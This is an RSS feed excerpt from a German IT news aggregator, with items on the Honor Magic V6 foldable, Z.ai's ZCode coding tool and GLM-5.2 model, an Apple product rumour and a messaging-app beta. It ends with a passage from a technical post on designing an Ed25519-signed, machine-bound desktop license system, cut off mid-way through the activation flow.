<link>https://tsecurity.de/de/3641331/it-nachrichten/faltbar-federleicht-und-fast-kompromisslos-test-honor-magic-v6/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641331/it-nachrichten/faltbar-federleicht-und-fast-kompromisslos-test-honor-magic-v6/</guid>
<pubDate>Thu, 02 Jul 2026 15:32:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[V6rblüffend. | Das Honor Magic V6 kombiniert ein extrem schlankes Design mit großem Akku, starker Ausstattung und vielseitigen Kameras. Trotz kleiner Verbesserungen gegenüber dem Vorgänger überzeugen Leistung und Alltagstauglichkeit, auch wenn Innendisplay und Kühlung noch Luft nach oben haben.]]></content:encoded>
</item>
<item>
<title><![CDATA[Z.ai launches ZCode to challenge Cursor, Claude Code and GitHub Copilot in AI coding]]></title>
<description><![CDATA[Z.ai, the Beijing-based artificial intelligence lab formerly known as Zhipu AI, on Wednesday officially launched ZCode, a free desktop application it describes as an "Agentic Development Environment" purpose-built for its flagship GLM-5.2 large language model. The move marks the company's most ag...]]></description>
<link>https://tsecurity.de/de/3640860/it-nachrichten/zai-launches-zcode-to-challenge-cursor-claude-code-and-github-copilot-in-ai-coding/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640860/it-nachrichten/zai-launches-zcode-to-challenge-cursor-claude-code-and-github-copilot-in-ai-coding/</guid>
<pubDate>Thu, 02 Jul 2026 13:01:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="http://z.ai/">Z.ai</a>, the Beijing-based artificial intelligence lab formerly known as Zhipu AI, on Wednesday officially launched <a href="https://zcode.z.ai/">ZCode</a>, a free desktop application it describes as an "Agentic Development Environment" purpose-built for its flagship <a href="https://z.ai/blog/glm-5.2">GLM-5.2</a> large language model. The move marks the company's most aggressive push yet into the fast-growing AI-powered coding tool market, where it now competes directly with <a href="https://cursor.com/get-started">Cursor</a>, <a href="https://www.anthropic.com/product/claude-code">Claude Code</a>, <a href="https://github.com/features/copilot">GitHub Copilot</a>, and <a href="https://antigravity.google/">Google's Antigravity</a>.</p><p>"Introducing ZCode, the official development environment for GLM-5.2," the company wrote on X, noting the tool is available on macOS, Windows, and Linux, supports bring-your-own-key (BYOK) configurations for third-party models, and offers a 1.5x usage-quota bonus for subscribers to its GLM Coding Plan.</p><p>Read one way, <a href="https://zcode.z.ai/">ZCode</a> is simply another entrant in a crowded market. Read another, it is a single product that crystallizes three of the most consequential trends in enterprise software today: the race-to-the-bottom pricing of frontier AI models, the geopolitical balkanization of the AI stack, and the rapid maturation of agentic coding agents into what Gartner now estimates is a <a href="https://enterprisedna.co/resources/news/gartner-enterprise-ai-coding-agents-10-billion-market-2026/">roughly $10 billion market</a>.</p><div></div><h2><b>An AI coding tool designed to think in projects, not prompts</b></h2><p>Unlike traditional IDEs that bolt on AI through a chat sidebar or autocomplete extension, <a href="https://zcode.z.ai/">ZCode</a> is best understood as an agent-first development environment. Its core design is built around long-horizon tasks: the user describes an outcome, the agent plans the work, edits files, runs checks, reviews progress, and continues across multiple iterations until the goal is met.</p><p><a href="https://zcode.z.ai/">ZCode</a> organizes the development experience around the <a href="https://zcode.z.ai/en">ZCode Agent</a>, deeply tuned for <a href="https://z.ai/blog/glm-5.2">GLM-5.2</a>, with emphasis on deep integration: the model, tools, and execution workflow are tuned together so the Agent fits continuous, multi-step real-world development tasks. The environment supports continuous follow-up across devices: desktop, mobile Remote, and Feishu / WeChat Bot can all keep the same workspace task moving. Sensitive commands, file changes, and high-permission actions go through confirmation before execution.</p><p>That remote-control feature — the ability to steer a running coding agent from <a href="https://www.wechat.com/en">WeChat</a>, <a href="https://baike.baidu.com/en/item/Feishu/14594">Feishu</a>, or <a href="https://web.telegram.org/">Telegram</a> on a phone — is a differentiator that speaks directly to the Chinese developer market, where those messaging platforms dominate professional communication. You can keep checking progress and adding instructions while long-running work continues, from any device with these messaging apps.</p><p>The tool is free to download. Revenue flows through Z.ai's <a href="https://z.ai/subscribe">GLM Coding Plan subscription tiers</a>, which start at $16.20 per month for a "Lite" plan and scale to $144 per month for "Max" — prices that undercut Anthropic's Claude Code and Cursor's comparable tiers by significant margins.</p><p>Through July 31, <a href="https://zcode.z.ai/">ZCode</a> is offering a promotional 1.5x effective quota bonus for Coding Plan subscribers, with off-peak token consumption charged at a 0.67x coefficient. The platform also supports multiple AI models and agents, including Claude Code, Codex, Gemini, and OpenCode — a pragmatic concession to the reality that no single model wins every task.</p><h2><b>GLM-5.2, the open-source model trained entirely on Chinese chips, powers the whole experience</b></h2><p>ZCode's value proposition is inseparable from <a href="https://z.ai/blog/glm-5.2">GLM-5.2</a>, the model it was designed to showcase. Z.ai released GLM-5.2 on June 16, first to its Coding Plan subscribers and subsequently as open-source weights under the MIT license on <a href="https://huggingface.co/zai-org/GLM-5">Hugging Face</a> — a sequencing decision that prioritized distribution over the traditional benchmark-led launch.</p><p>The model's specifications are formidable. GLM-5.2 is a 744-billion-parameter mixture-of-experts architecture with 40 billion active parameters, a genuine one-million-token context window — five times the 200K limit on its predecessor — and training on 28.5 trillion tokens. It ranked second globally on <a href="https://arena.ai/leaderboard/code/webdev">Code Arena </a>as of mid-June, trailing only Anthropic's Claude Fable 5, making it one of the highest-performing publicly available models for coding tasks.</p><p>Critically, the model was built entirely without American chips. As Decrypt reported, GLM-5.2 "<a href="https://decrypt.co/371613/china-z-ai-glm-5-2-model-rivals-claude-opus">runs entirely on Huawei silicon</a>." Stability AI founder Emad Mostaque estimated total training costs at roughly $25 million, with 80 percent spent on post-training — a figure that, if accurate, would make GLM-5.2 extraordinarily cheap relative to Western frontier models.</p><p>On benchmarks, <a href="https://z.ai/blog/glm-5.2">GLM-5.2</a> performs within striking distance of the best proprietary systems. It trails Anthropic's Claude Opus 4.8 by just one percentage point on <a href="https://www.frontierswe.com/">FrontierSWE</a>, a benchmark measuring multi-hour autonomous engineering projects, while edging out OpenAI's <a href="https://openai.com/index/introducing-gpt-5-5/">GPT-5.5</a>. </p><p>Its API pricing — $1.40 per million input tokens and $4.40 per million output — are a cost reduction of up to 82 percent compared to Anthropic's Claude Opus 4.8 at $5 and $25, respectively. Because ZCode is a first-party tool from the same company that makes the model, it requires no manual endpoint configuration — the model is wired in.</p><h2><b>The Anthropic export ban gave Chinese AI its biggest opening yet</b></h2><p>ZCode's arrival cannot be separated from the geopolitical drama that has roiled the AI industry over the past three weeks. On June 12, the U.S. government, <a href="https://www.reuters.com/technology/us-blocks-foreign-access-anthropics-most-advanced-ai-models-axios-reports-2026-06-13/">citing national security authorities</a>, issued an export control directive suspending all access to Anthropic's Fable 5 and Mythos 5 models by any foreign national, whether inside or outside the United States, including foreign national Anthropic employees. Enterprise clients in finance, healthcare, SaaS, and critical infrastructure found their core intelligence services abruptly disabled, without exception, prior warning, or effective recourse.</p><p>While the Trump administration <a href="https://www.cnbc.com/2026/06/30/anthropic-says-trump-admin-has-lifted-export-controls-on-claude-fable-5-and-mythos-5.html">lifted those controls just yesterday</a> — Anthropic confirmed on June 30 that the Department of Commerce had rescinded the directive — the episode sent shockwaves through the developer community and accelerated interest in open-source, self-hostable alternatives. The government's crackdown on Anthropic coincided with a swift rise in Chinese open-source models that are proving to be almost as capable and significantly cheaper than some of the most powerful U.S. models.</p><p>Z.ai's timing was surgical. On the same day the Trump administration ordered Anthropic's most advanced models blocked for foreign nationals, Zhipu announced the <a href="https://z.ai/blog/glm-5.2">open-source release of GLM-5.2</a> with no usage restrictions. The <a href="https://www.scmp.com/tech/article/3343239/chinas-zhipu-ai-launches-new-major-model-glm-5-challenge-its-rivals">South China Morning Post reported </a>that GLM-5.2 would be available to all users of Zhipu's new GLM Coding Plan subscription, "priced at just a tenth of Anthropic's premium Claude Code and Claude Max tiers."</p><p>The market responded accordingly. Zhipu AI's market capitalization crossed HK$1 trillion (<a href="https://www.scmp.com/tech/article/3357858/zhipu-ai-market-cap-tops-hk1-trillion-shares-glm-52-developer-soar">US$128 billion</a>) on June 22, driven by a 42 percent intraday share surge. JPMorgan raised its 2026–2030 revenue forecast for Zhipu by between 7 and 16 percent following the launch, projecting an over 534 percent revenue surge for 2026 and expecting the AI firm to turn a profit by 2028.</p><h2><b>Why vendor lock-in now carries a geopolitical risk that no SLA can cover</b></h2><p>The <a href="https://venturebeat.com/technology/anthropic-is-bringing-back-claude-fable-5-globally-after-us-lifts-export-control-order-where-can-enterprises-access-it">Fable 5 episode</a> did more than embarrass Anthropic. It introduced a new risk category into enterprise AI procurement: sovereign access risk. When a government can disable a commercially deployed AI model overnight, the traditional evaluation criteria of developer experience, benchmark scores, and pricing become secondary to a more fundamental question: Will this tool still work tomorrow?</p><p>The event exposed the inadequacy of standard enterprise contract language. An investigation by <a href="https://www.fifthrow.com/blog/us-export-control-order-and-global-suspension-of-fable-5-mythos-5-operationalizing-compliance-as-a">FifthRow</a> found that almost all standard Data Processing Addenda, SaaS agreements, and procurement SLAs "relied on vague 'force majeure' or 'compliance with law' catch-alls, not on precise, actionable regulatory suspension or kill-switch clauses."</p><p>ZCode's <a href="https://aiidelist.com/ide/zcode">BYOK architecture </a>and <a href="https://z.ai/blog/glm-5.2">GLM-5.2</a>'s MIT-licensed open weights offer a partial answer. A development team can download the model, host it on its own infrastructure, and run ZCode against it without ever touching Z.ai's cloud — eliminating both American export-control risk and Chinese data-sovereignty concerns in a single move. The catch is that anyone using Z.ai's cloud API remains subject to Chinese law, a consideration that evaporates only with pure self-hosting.</p><p>Gartner analysts <a href="https://news.creeta.com/en/gartner-enterprise-ai-coding-agents-2026/">have warned</a> that governance, pricing, support, workflows, commercial maturity, and market durability matter as much as developer experience and model capabilities when evaluating coding agent vendors for enterprise-wide adoption. By that measure, ZCode faces a steep climb. It is not open source itself; Linux support remains in beta; and security reviewers have flagged the need for careful evaluation of its credential handling, particularly for remote development over SSH and messaging-platform-triggered tasks — an agent that can be summoned from WeChat involves access paths that should be mapped before trusting it with anything sensitive.</p><h2><b>Inside the $10 billion race where model labs are becoming full-stack IDE companies</b></h2><p><a href="https://zcode.z.ai/">ZCode</a> enters one of the most crowded and fastest-moving markets in enterprise software. Enterprise AI coding agents are capturing a growing share of enterprise software engineering spend, with the market estimated at roughly $9.8 billion to $11.0 billion annualized as of April 2026, according to <a href="https://enterprisedna.co/resources/news/gartner-enterprise-ai-coding-agents-10-billion-market-2026/">Gartner</a>. A defining shift this year, the analyst firm noted, is "the movement of frontier model providers into direct competition with application-layer vendors" — precisely the pattern ZCode embodies.</p><p>Gartner codified this evolution in May when it <a href="https://openai.com/index/gartner-2026-agentic-coding-leader/">renamed its annual Magic Quadrant</a> from "AI Code Assistants" to "Enterprise AI Coding Agents," defining the category as "autonomous or semiautonomous software engineering solutions that perceive context, translate human intent into multistep plans, and execute and verify those steps across code, tests and related engineering artifacts." The 2026 Magic Quadrant names Anthropic, Cursor, GitHub, and OpenAI as Leaders. Z.ai was not among the 12 vendors evaluated — an absence that underscores both the company's nascent enterprise sales presence outside China and the Western-centric lens through which the analyst community still views the market.</p><p>The competitive landscape is daunting. Cursor is the <a href="https://www.bloomberg.com/news/articles/2026-03-02/cursor-recurring-revenue-doubles-in-three-months-to-2-billion">$2 billion ARR IDE</a> that feels like VS Code with a supercharger. Claude Code reached <a href="https://www.anthropic.com/news/anthropic-raises-30-billion-series-g-funding-380-billion-post-money-valuation">approximately $2.5 billion</a> in annualized revenue by early 2026. Google relaunched <a href="https://blog.google/innovation-and-ai/technology/developers-tools/google-io-2026-developer-highlights/">Antigravity 2.0</a> at I/O in May, and Cognition retired the Windsurf brand, relaunching the IDE as <a href="https://devin.ai/desktop/">Devin Desktop</a> with the Agent Command Center as the default surface.</p><p>Against these entrenched players, ZCode's pitch rests on three pillars: deep first-party integration with GLM-5.2 that no third-party editor can replicate, aggressive pricing that starts at a fraction of Western competitors, and MIT-licensed open weights that allow enterprises to self-host — eliminating the regulatory kill-switch risk that the Fable ban made viscerally real.</p><h2><b>Z.ai's real challenge is turning a $128 billion valuation into a global developer tools business</b></h2><p><a href="http://z.ai/">Z.ai</a> controls the model (<a href="https://z.ai/blog/glm-5.2">GLM-5.2</a>), the subscription layer (<a href="https://z.ai/subscribe">the GLM Coding Plan</a>), and the IDE (<a href="https://zcode.z.ai/">ZCode</a>) — a tightly coupled stack that optimizes for performance but concentrates switching costs. For the company, the business logic is clear. Its most reliable revenue stream has been on-premises deployments for Chinese government agencies, state-owned banks, and energy conglomerates. In full-year 2025, on-premises deployment revenue reached RMB 534 million, growing over 100 percent year-over-year and accounting for 73.7 percent of total revenue with a gross margin of 48.8 percent. ZCode and the GLM Coding Plan represent the company's bid to build a comparable revenue engine in cloud-based developer tools — globally, not just in China.</p><p>The early signals are encouraging for <a href="http://z.ai/">Z.ai</a>, if anecdotal. Community reception on X was enthusiastic, with one early user calling the tool "super stable" and others clamoring for more Coding Plan capacity. "Bro, can't snag your family's Coding Plan? When are you gonna stock up on more cards?" <a href="https://x.com/realchendahuang/status/2072361920976593163">one user wrote in Chinese</a>, suggesting demand is already outstripping supply.</p><p>But the hard questions loom large. Can a Chinese AI company build trust with Western enterprise buyers amid escalating technology tensions? Can ZCode's ecosystem mature fast enough to compete with Cursor's polished UX, Claude Code's deep agent primitives, and GitHub Copilot's unmatched distribution? And can Z.ai sustain a company valued at $128 billion while still losing money? </p><p>What is no longer in question is the competitive dynamic itself. Three weeks ago, a U.S. government directive proved that access to the world's best coding model can vanish overnight. Today, a Chinese lab is shipping a free IDE, an open-source model trained on zero American chips, and a subscription plan that costs less per month than a single lunch in Manhattan. The AI coding agent market did not just become global this summer. It became a market where the fallback option might be better than the thing it's falling back from — and that changes the calculus for every engineering leader choosing a toolchain in the second half of 2026.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple readying four iPad Pro models & entry M7 MacBook Pro for early 2027 release]]></title>
<description><![CDATA[It's not exactly the most unexpected rumor, but a new report claims that Apple is working on an iPad Pro refresh, and a new entry-level MacBook Pro with M7 for spring 2027.iPad Pro can replace the MacBook Pro for some usersIf the rumor is accurate, that moves the iPad Pro from a previous fall lau...]]></description>
<link>https://tsecurity.de/de/3639726/ios-mac-os/apple-readying-four-ipad-pro-models-entry-m7-macbook-pro-for-early-2027-release/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639726/ios-mac-os/apple-readying-four-ipad-pro-models-entry-m7-macbook-pro-for-early-2027-release/</guid>
<pubDate>Wed, 01 Jul 2026 23:25:00 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It's not exactly the most unexpected rumor, but a new report claims that Apple is working on an iPad Pro refresh, and a new entry-level <a href="https://appleinsider.com/inside/macbook-pro" title="MacBook Pro" data-kpt="1">MacBook Pro</a> with M7 for spring 2027.<br><br><div><img src="https://photos5.appleinsider.com/gallery/59661-121972-13-iPP-vs-14-MBP-xl.jpg" alt="13-inch iPad Pro in a Magic Keyboard next to 14-inch MacBook Pro on a desk" height="738"><br><span>iPad Pro can replace the MacBook Pro for some users</span></div><br>If the rumor is accurate, that moves the <a href="https://appleinsider.com/inside/ipad-pro" title="iPad Pro" data-kpt="1">iPad Pro</a> from a previous fall launch cycle to the spring. This will help level out Apple's earnings cycle, and move some new releases out of the holiday quarter, and into the spring and back-to-school purchasing season.<br><br>Any new iPad Pro will be an incremental update, with screen sizes expected to remain the same. No redesign is expected, and one is not predicted in <a href="https://www.bloomberg.com/news/articles/2026-07-01/apple-readies-new-ipad-pro-redesigned-entry-macbook-pro-for-first-half-2027">Wednesday's report</a> from <em>Bloomberg</em>.<br><br><br> <a href="https://appleinsider.com/articles/26/07/01/apple-readying-four-ipad-pro-models-entry-m7-macbook-pro-for-early-2027-release?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244848?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[v8.18.0-beta.1]]></title>
<description><![CDATA[Polls can now be created in individual chats too. Present a curated list of choices to your indecisive friend, or recapture the magic of passing a note to your crush by creating a “Do you like me? Y/N/Maybe” poll.]]></description>
<link>https://tsecurity.de/de/3639380/tools/v8180-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639380/tools/v8180-beta1/</guid>
<pubDate>Wed, 01 Jul 2026 20:08:57 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ul>
<li>Polls can now be created in individual chats too. Present a curated list of choices to your indecisive friend, or recapture the magic of passing a note to your crush by creating a “Do you like me? Y/N/Maybe” poll.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Honor Magic V6: Foldable startet für 2.299,90 Euro in Deutschland]]></title>
<description><![CDATA[Honor hatte es für den chinesischen Markt bereits im März 2026 vorgestellt – das Foldable Magic V6. Jetzt startet das mobile Endgerät jedoch auch in Europa bzw. Deutschland. Hierzulande kostet es 2.299,90 Euro. Der Hersteller wirbt unter anderem mit einer...Zum Beitrag: Honor Magic V6: Foldable s...]]></description>
<link>https://tsecurity.de/de/3639350/it-nachrichten/honor-magic-v6-foldable-startet-fuer-229990-euro-in-deutschland/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639350/it-nachrichten/honor-magic-v6-foldable-startet-fuer-229990-euro-in-deutschland/</guid>
<pubDate>Wed, 01 Jul 2026 19:48:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Honor hatte es für den chinesischen Markt bereits im März 2026 vorgestellt – das Foldable Magic V6. Jetzt startet das mobile Endgerät jedoch auch in Europa bzw. Deutschland. Hierzulande kostet es 2.299,90 Euro. Der Hersteller wirbt unter anderem mit einer...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/honor-magic-v6-foldable-startet-fuer-2-29990-euro-in-deutschland/">Honor Magic V6: Foldable startet für 2.299,90 Euro in Deutschland</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Honor Magic V6: Dünnes Foldable mit Snapdragon 8 Elite Gen 5 startet mit Rabatt]]></title>
<description><![CDATA[Zum MWC 2026 hatte Honor das Magic V6 bereits gezeigt und den Verkaufsstart für die zweite Jahreshälfte angekündigt. Heute ab 16 Uhr kann das dünne Foldable mit Snapdragon 8 Elite Gen 5, das zugeklappt dünner als ein iPhone 17 Pro Max ist, nun erworben werden.]]></description>
<link>https://tsecurity.de/de/3638238/it-nachrichten/honor-magic-v6-duennes-foldable-mit-snapdragon-8-elite-gen-5-startet-mit-rabatt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638238/it-nachrichten/honor-magic-v6-duennes-foldable-mit-snapdragon-8-elite-gen-5-startet-mit-rabatt/</guid>
<pubDate>Wed, 01 Jul 2026 13:18:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://pics.computerbase.de/1/2/3/5/6/4-273101f7a29a3e25/article-640x360.eac0eaa3.jpg"><p>Zum MWC 2026 hatte Honor das Magic V6 bereits gezeigt und den Verkaufsstart für die zweite Jahreshälfte angekündigt. Heute ab 16 Uhr kann das dünne Foldable mit Snapdragon 8 Elite Gen 5, das zugeklappt dünner als ein iPhone 17 Pro Max ist, nun erworben werden.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Asymmetric Signing, Machine Fingerprinting, and Offline Grace Periods: Building a License System…]]></title>
<description><![CDATA[Asymmetric Signing, Machine Fingerprinting, and Offline Grace Periods: Building a License System That Actually WorksHow DotScramble protects its Pro tier using Ed25519 cryptography — without phoning home on every launchA technical deep-dive into license system design for desktop applications — th...]]></description>
<link>https://tsecurity.de/de/3638150/hacking/asymmetric-signing-machine-fingerprinting-and-offline-grace-periods-building-a-license-system/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638150/hacking/asymmetric-signing-machine-fingerprinting-and-offline-grace-periods-building-a-license-system/</guid>
<pubDate>Wed, 01 Jul 2026 12:21:48 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Asymmetric Signing, Machine Fingerprinting, and Offline Grace Periods: Building a License System That Actually Works</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/800/1*YN9I5rHkcktrdbyWgEKykg.png"></figure><h3>How DotScramble protects its Pro tier using Ed25519 cryptography — without phoning home on every launch</h3><p><em>A technical deep-dive into license system design for desktop applications — threat modelling, Ed25519 token verification, weighted hardware fingerprinting, and background revocation detection.</em></p><h3>The Problem With Most Desktop License Systems</h3><p>Most desktop software license systems fall into one of two failure modes.</p><p><strong>The naive implementation:</strong> a hardcoded or obfuscated license key string that the app compares against. Crack once, share forever. A single keygen posted to any forum defeats it permanently.</p><p><strong>The over-engineered implementation:</strong> online-only validation that calls home on every launch. Legitimate users can’t use the software on a plane, at a conference, or when the license server has a bad day. The result is user experience indistinguishable from DRM — with all the goodwill cost that implies.</p><p>DotScramble needed something in between: cryptographically sound, functional offline for days at a time, with server-enforced revocation when internet is available. This post covers how that system works.</p><h3>The Threat Model</h3><p>Before any implementation decisions, a clear adversary model:</p><p>Attack vectorRealistic?DefenceCopy .py source to another machineTrivialMachine fingerprinting + Cython binaryShare one API key across N machinesLikelyServer-side activation limit (max 2)Patch is_max_activated = True in sourceOne lineCython .so compilationForge a license token offlineRequires Ed25519 private keyAsymmetric signing — public key only in clientUse indefinitely without networkEasy7-day token TTL + background recheckRoll back system clock to extend tokenCleverMonotonic timestamp stored in SQLiteRevoked key continues workingSilentBackground 24h server recheck</p><p>The objective was not unbreakable DRM — that doesn’t exist for software running on user-controlled hardware. The objective was to make casual circumvention more expensive than purchasing a license, while making legitimate use completely frictionless.</p><h3>Why Ed25519</h3><p>The classical alternative is HMAC-SHA256 with a shared secret. The fundamental problem: if the client holds a shared secret, it can forge. You can obfuscate the secret, compile it into a binary, XOR it with a magic constant — but it’s still in there, and extraction is a solved problem.</p><p>Ed25519 eliminates the forgery surface entirely:</p><pre>Private key  →  lives only on the license server  →  signs tokens<br>Public key   →  hardcoded in the client binary    →  verifies tokens, cannot forge</pre><p>The mathematics of elliptic curve cryptography guarantee that knowledge of the public key reveals nothing useful about the private key. An attacker who fully reverses the client binary, extracts the public key, and understands the entire verification flow still cannot produce a valid signature. The only path to a forged token is compromising the server.</p><p>The public key in license_manager.py is 32 bytes:</p><pre>_ED25519_PUBLIC_KEY_B64 = "DQ0zJAi1S0c+NUhOP3050au9k5/fYwLU45ayTZIFVuI="</pre><p>This is the entire cryptographic boundary between the client and unlimited offline activation.</p><h3>Token Structure</h3><p>Every activated machine receives a <strong>signed license token</strong> — a compact, self-contained credential the app can verify locally without any network call.</p><p>Format: two Base64URL strings joined by .</p><pre>&lt;base64url(JSON payload)&gt;.&lt;base64url(Ed25519 signature)&gt;</pre><p>Payload structure:</p><pre>{<br>  "mid": "a3f1b2c9d4e5f6a7b8c9d0e1f2a3b4c5",<br>  "name": "FreeRave",<br>  "plan": "max",<br>  "exp": 1782000000<br>}</pre><ul><li>mid — the machine fingerprint (32 hex chars, SHA-256 of hardware identifiers)</li><li>name — displayed to the user on activation</li><li>plan — tier identifier ("max" = Pro)</li><li>exp — Unix timestamp expiry; server controls token lifetime</li></ul><p>The server signs the raw JSON bytes with its Ed25519 private key. The client verifies using the hardcoded public key, then checks expiry and machine binding. All three must pass.</p><h3>The Verification Function</h3><pre>def _verify_token(self, token: str) -&gt; Tuple[bool, dict]:<br>    try:<br>        from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PublicKey<br><br>parts = token.split(".")<br>        if len(parts) != 2:<br>            return False, {}<br>        payload_b64, sig_b64 = parts<br>        # Dynamic Base64 padding - JWT/URL-safe Base64 strips trailing '='<br>        # The expression (-len(s) % 4) gives: 0 if already padded, else 1-3<br>        def _b64dec(s: str) -&gt; bytes:<br>            return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4))<br>        payload_bytes = _b64dec(payload_b64)<br>        sig_bytes     = _b64dec(sig_b64)<br>        pub_raw    = base64.b64decode(_ED25519_PUBLIC_KEY_B64)<br>        public_key = Ed25519PublicKey.from_public_bytes(pub_raw)<br>        public_key.verify(sig_bytes, payload_bytes)  # raises InvalidSignature on tamper<br>        payload = json.loads(payload_bytes.decode())<br>        # Gate 1: expiry<br>        if payload.get("exp", 0) &lt; time.time():<br>            return False, {}<br>        # Gate 2: machine binding<br>        if payload.get("mid", "") != self.generate_machine_id():<br>            return False, {}<br>        return True, payload<br>    except Exception:<br>        return False, {}</pre><p>Three gates in sequence. Fail any one, the token is rejected and local activation is cleared. The except Exception: return False, {} catch-all is intentional — any unexpected error (missing field, malformed base64, truncated token) is treated as a verification failure, not as a crash.</p><blockquote><strong><em>On the padding trick:</em></strong><em> URL-safe Base64 used in JWTs often strips trailing </em><em>= padding. </em><em>(-len(s) % 4) is a modular arithmetic shorthand that adds exactly the right number: if </em><em>len(s) % 4 == 0, adds 0; otherwise adds </em><em>4 - (len(s) % 4). This avoids an if/else chain and handles all cases correctly.</em></blockquote><h3>Machine Fingerprinting</h3><p>The machine ID is a 32-character hex string that must be <strong>stable across reboots</strong>, <strong>unique enough to distinguish machines</strong>, and <strong>cross-platform</strong>. The approach is a weighted combination of hardware identifiers, hashed to a fixed-length output:</p><pre>@staticmethod<br>def generate_machine_id() -&gt; str:<br>    factors: dict[str, str] = {}<br><br># Platform-specific hardware ID - primary anchor<br>    try:<br>        if platform.system() == "Linux":<br>            # /etc/machine-id: written once at OS install by systemd<br>            # Survives: reboots, kernel updates, VPN, hostname changes<br>            # Does not survive: full OS reinstall<br>            with open("/etc/machine-id") as f:<br>                factors["mid"] = f.read().strip()<br>        elif platform.system() == "Windows":<br>            import winreg<br>            key = winreg.OpenKey(<br>                winreg.HKEY_LOCAL_MACHINE,<br>                r"SOFTWARE\Microsoft\Cryptography"<br>            )<br>            # MachineGuid: equivalent to /etc/machine-id on Windows<br>            factors["mid"] = winreg.QueryValueEx(key, "MachineGuid")[0]<br>        elif platform.system() == "Darwin":<br>            import subprocess<br>            out = subprocess.check_output(<br>                ["ioreg", "-rd1", "-c", "IOPlatformExpertDevice"],<br>                stderr=subprocess.DEVNULL<br>            )<br>            for line in out.decode().splitlines():<br>                if "IOPlatformUUID" in line:<br>                    factors["mid"] = line.split('"')[-2]<br>                    break<br>    except:<br>        pass<br>    # Secondary factors - supplement if primary unavailable (e.g., container)<br>    try:<br>        factors["cpu"] = str(os.cpu_count() or 0)<br>    except:<br>        pass<br>    factors["os"] = platform.system()<br>    # MAC address - only if real hardware, not randomized<br>    try:<br>        mac_int = _uuid.getnode()<br>        # Bit 40 (the "locally administered" bit) is 1 for randomized MACs<br>        # Randomized MACs change on every boot - useless as a stable anchor<br>        if not (mac_int &gt;&gt; 40) &amp; 1:<br>            factors["mac"] = hex(mac_int)[2:].upper().zfill(12)<br>    except:<br>        pass<br>    # Sort for determinism regardless of which factors are available<br>    factor_str = "|".join(f"{k}:{v}" for k, v in sorted(factors.items()))<br>    return hashlib.sha256(factor_str.encode()).hexdigest()[:32]</pre><p><strong>Why </strong><strong>sorted(factors.items())?</strong> Dict insertion order in Python 3.7+ is deterministic, but only if the same keys are always inserted in the same order. If, for example, the MAC address is unavailable on one run (kernel randomization), the dict has fewer keys and the order changes. Sorting by key ensures the concatenated string — and therefore the hash — is identical regardless of which optional factors are present.</p><p><strong>The MAC randomization filter:</strong> Modern Linux privacy kernels and NetworkManager configurations use MAC address randomization. Bit 40 of the MAC integer is the “locally administered” bit — set to 1 for locally generated (randomized) addresses. Including a randomized MAC in the fingerprint would cause activation to break after every reboot. The bitmask check (mac_int &gt;&gt; 40) &amp; 1 filters these out.</p><p><strong>Container environments:</strong> In Docker or LXC, /etc/machine-id may not exist. The try/except blocks ensure graceful degradation — if the primary identifier is missing, the fingerprint falls back to CPU count + OS string + MAC (if available). This is a weaker fingerprint but still functional.</p><h3>The Activation Flow</h3><pre>User clicks "Activate Pro"<br>        │<br>        ▼<br>LocalAuthManager.start()<br>  → Binds to 127.0.0.1:0 (port 0 = OS assigns ephemeral port atomically)<br>  → Generates 32-byte CSRF state token via secrets.token_urlsafe(32)<br>        │<br>        ▼<br>webbrowser.open(<br>  "https://dotsuite.vercel.app/en/dashboard/dotscramble/auth?port=PORT&amp;state=STATE"<br>)<br>        │<br>        ▼<br>User authenticates in browser, clicks "Activate"<br>        │<br>        ▼<br>Dashboard: POST http://127.0.0.1:PORT/callback<br>  Body: { "key": "&lt;api_key&gt;", "state": "&lt;state_token&gt;" }<br>        │<br>        ▼<br>AuthHandler.do_POST()<br>  → Content-Length check: reject if &gt; 4096 or ≤ 0  (OOM DoS prevention)<br>  → secrets.compare_digest(received_state, expected_state)  (CSRF check)<br>  → on_key_received(api_key) called<br>        │<br>        